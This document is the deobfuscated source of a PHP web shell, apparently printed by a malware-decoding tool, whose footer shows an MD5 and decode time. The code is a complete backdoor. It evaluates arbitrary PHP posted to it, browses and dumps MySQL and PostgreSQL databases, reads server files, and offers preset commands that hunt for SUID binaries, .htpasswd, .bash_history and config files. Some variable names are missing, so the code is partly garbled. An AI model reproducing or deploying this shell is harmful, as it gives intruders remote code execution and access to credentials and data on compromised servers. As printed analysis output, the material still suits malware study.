onclick="g('FilesTools',null,'" . urlencode($f["name"]) . "', 'download')">D</a>" : '') . "</td></tr>"; $l = $l ? 0 : 1; } echo "<tr id=fak><td colspan=7>
	<input type=hidden name=ne value=''>\xa	<input type=hidden name=a value='FilesMan'>\xa\x9<input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'>\xa	<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
	<label><select name='p1'>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) { echo "<option value='paste'>\342\206\263 Paste</option>"; } echo "<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if (class_exists("ZipArchive")) { echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>"; } echo "<option value='tar'>+ tar.gz</option>"; echo "</select></label>"; if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"]) && ($_COOKIE["act"] == "zip" || $_COOKIE["act"] == "tar")) { echo "&nbsp;file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE["act"] == "zip" ? "zip" : "tar.gz") . "'>&nbsp;"; } echo "<input type='submit' value='submit' style='margin-left:10px'></td></tr></form></table></div>"; hardFooter(); } goto aQGQk; gkT1m: @ini_set("max_execution_time", 0); goto poC4M; u_TFV: $ = true; goto oSUTr; p3F43: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "key", $); } goto UOKiC; aQGQk: function actionStringTools() { if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("hex2ascii")) { function hex2ascii($p) { $r = ''; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("ascii2hex")) { function ascii2hex($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } return strtoupper($r); } } if (!function_exists("full_urlencode")) { function full_urlencode($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd	\'\x0") . "';
"; echo strlen($temp), "
", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<h1>String conversions</h1><div class=content>"; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>"; foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; } echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px' id='strOutput'>"; if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } echo "</pre></div><br><h1>Search files:</h1><div class=content>
		<form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xa\x9\x9	<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xa	\x9	<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS["cwd"]) . "' style='width:100%'></td></tr>
	\x9	<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\xa\x9\x9\x9<tr><td></td><td><input type='submit' value='submit'></td></tr>\xa	\x9	</table></form>"; function hardRecursiveGlob($path) { if (substr($path, -1) != "/") { $path .= "/"; } $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); if (is_array($paths) && @count($paths)) { foreach ($paths as $) { if (@is_dir($)) { if ($path != $) { hardRecursiveGlob($); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($), $_POST["p2"]) !== false) { echo "<a href='#' onclick='g("FilesTools",null,"" . urlencode($) . "", "view","")'>" . htmlspecialchars($) . "</a><br>"; } } } } } if (@$_POST["p3"]) { hardRecursiveGlob($_POST["c"]); } echo "</div><br><h1>Search for hash:</h1><div class=content>
\x9\x9<form method='post' target='_blank' name='hf'>
\x9	\x9<input type='text' name='hash' style='width:330px;'><br>\xa            <input type='hidden' name='act' value='find'/><br>\xa		\x9<input type='submit' value='' onclick="document.hf.action=''+document.hf.hash.value+'&s=md5';document.hf.submit()">
\x9	\x9<input style='margin-left: 20px;' type='submit' value='' onclick="document.hf.action='';document.hf.submit()"><br>
\x9	</form></div>"; hardFooter(); } goto gaKKg; qZ6Xj: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto VMrgb; WeQHr: $ = md5($_SERVER["HTTP_USER_AGENT"]); goto p3F43; r4nyR: $ = "fa769dac7a0a94ee47d8ebe021eaba9e"; goto u_TFV; xWgYK: function actionPhp() { if (isset($_POST["ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = true; ob_start(); eval($_POST["p1"]); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa\xd	\'\x0") . "';\xa"; echo strlen($temp), "\xa", $temp; die; } hardHeader(); if (isset($_POST["p2"]) && $_POST["p2"] == "info") { echo "<h1>PHP info</h1><div class=content>"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace("!body {.*}!msiU", '', $tmp); $tmp = preg_replace("!a:\w+ {.*}!msiU", '', $tmp); $tmp = preg_replace("!h1!msiU", "h2", $tmp); $tmp = preg_replace("!td, th {(.*)}!msiU", ".e, .v, .h, .h th {$1}", $tmp); $tmp = preg_replace("!body, td, th, h2, h2 {.*}!msiU", '', $tmp); echo $tmp; echo "</div><br>"; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = false; } echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; if (!empty($_POST["p1"])) { ob_start(); eval($_POST["p1"]); echo htmlspecialchars(ob_get_clean()); } echo "</pre></div>"; hardFooter(); } goto bY27C; Th0Rk: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto w9TDR; OWR26: function hardFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='#f9c440'>[ Writeable ]</font>" : " <font color=#a10705>(Not writable)</font>"; echo "
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
\x9<tr>\xa		<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g(null,this.c.value,'');" : '') . "return false;"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='submit'></form></td>\xa		<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value);" : '') . "return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
\x9</tr><tr>\xa\x9\x9<td><form onsubmit="" . (function_exists("actionFilesMan") ? "g('FilesMan',null,'mkdir',this.d.value);" : '') . "return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>
\x9	<td><form onsubmit="" . (function_exists("actionFilesTools") ? "g('FilesTools',null,this.f.value,'mkfile');" : '') . "return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>
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"</b></font>"; } } goto YnRbs; IVjDo: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find files" => "find / -type f -name", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate files" => "locate", "locate" => "locate", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto Oda8Q; oh1bD: function hardHeader() { if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["\xe2\226\x9c"]; } echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . 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" ]</a> "; } } } echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " <a href="" . urlencode(@php_uname()) . "" target="_blank">[ Google ]</a> <a href="" . $explink . "" target=_blank>[ Exploit-DB ]</a></nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=#a10705>ON</font>" : "<font color=#f9c440><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . viewSize($totalSpace) . " <span>Free:</span> " . viewSize($freeSpace) . " (" . round(100 / ($totalSpace / $freeSpace), 2) . "%)<br>" . $cwd_links . " " . viewPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">" . $opt_charsets . "</select></label><br><span>Server IP:</span><br>" . gethostbyname($_SERVER["HTTP_HOST"]) . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="background-color:#0d52bf;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div>"; } goto OWR26; rGxXC: function actionSql() { class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysql_query($str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysql_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysql_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql_set_charset")) { return @mysql_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '" . addslashes($str) . "';select file from hard2;"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query("drop table hard2"); return array("file" => implode("\xa", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); $create = mysql_fetch_array($res); $sql = $create[1] . ";
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("SELECT * FROM `" . $table . "`"); $i = 0; $head = true; while ($ = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";\xa\xa"; } $columns = array(); foreach ($ as $k => $v) { if ($v === null) { $[$k] = "NULL"; } elseif (is_int($v)) { $[$k] = $v; } else { $[$k] = "'" . @mysql_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES \xa	(" . implode(", ", $) . ")"; $head = false; } else { $sql .= "\xa\x9,(" . implode(", ", $) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, ";

"); } else { echo ";

"; } } break; case "pgsql": $this->query("SELECT * FROM " . $table); while ($ = $this->fetch()) { $columns = array(); foreach ($ as $k => $v) { $[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $) . ");" . "
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["type"]); if (@$_POST["p2"] == "download" && @$_POST["p1"] != "select") { $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); $db->selectdb($_POST["sql_base"]); switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } if (empty($_POST["file"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach ($_POST["tbl"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["file"], "w")) { foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["p2"]); } else { die("<script>alert("Error! Can't open file");window.history.back(-1)</script>"); } } hardHeader(); echo "
<h1>Sql browser</h1><div class=content>\xa<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\xa<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xa<td><label><select name='type'><option value='mysql' "; if (@$_POST["type"] == "mysql") { echo "selected"; } echo ">MySql</option><option value='pgsql' "; if (@$_POST["type"] == "pgsql") { echo "selected"; } echo ">PostgreSql</option></select></label></td>\xa<td><input type=text name=sql_host value="" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . ""></td>\xa<td><input type=text name=sql_login value="" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . ""></td>\xa<td><input type=text name=sql_pass value="" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . "" required></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } $db->listDbs(); echo "<label><select name=sql_base><option value=''></option>"; while ($ = $db->fetch()) { list($key, $value) = each($); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } echo "</select></label>"; } else { echo $tmp; } } else { echo $tmp; } echo "</td>
		\x9\x9<td><input type=submit value='submit' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> count the number of rows</td>\xa\x9	\x9</tr>\xa		</table>\xa	\x9<script>\xa            s_db='" . @addslashes($_POST["sql_base"]) . "';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xa                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
\x9	\x9function st(t,l) {
\x9			d.sf.p1.value = 'select';
	\x9	\x9d.sf.p2.value = t;\xa                if(l && d.sf.p3) d.sf.p3.value = l;
	\x9		d.sf.submit();\xa\x9\x9\x9}
\x9	\x9function is() {\xa\x9\x9	\x9for(i=0;i<d.sf.elements['tbl[]'].length;++i)\xa	\x9	\x9	d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xa\x9\x9\x9}\xa		</script>"; if (isset($db) && $db->link) { echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if (!empty($_POST["sql_base"])) { $db->selectdb($_POST["sql_base"]); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while ($ = $db->fetch($tbls_res)) { list($key, $value) = each($); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? "&nbsp;" : " <small>({$n["n"]})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if (@$_POST["p1"] == "select") { $_POST["p1"] = "query"; $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); $num = $db->fetch(); $pages = ceil($num["n"] / 30); echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; echo " of {$pages}"; if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>&lt; Prev</a>"; } if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next &gt;</a>"; } $_POST["p3"]--; if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } echo "<br><br>"; } if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { $title = false; echo "<table width=100% cellspacing=1 cellpadding=2 class=main>"; $line = 1; while ($ = $db->fetch()) { if (!$title) { echo "<tr>"; foreach ($ as $key => $value) { echo "<th>" . $key . "</th>"; } reset($); $title = true; echo "</tr><tr>"; $line = 2; } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($ as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } echo "</table>"; } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='submit'></form>"; } } if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } } else { echo htmlspecialchars($db->error()); } echo "</div>"; hardFooter(); } goto et3or; hwJg4: @ini_set("log_errors", 0); goto gkT1m; WJp40: $home_cwd = @getcwd(); goto YIyjV; G6Uv3:  ?>

Function Calls





MD5 85aeeeafacfc2339d2c46f6992e4e08a
Eval Count 0
Decode Time 115 ms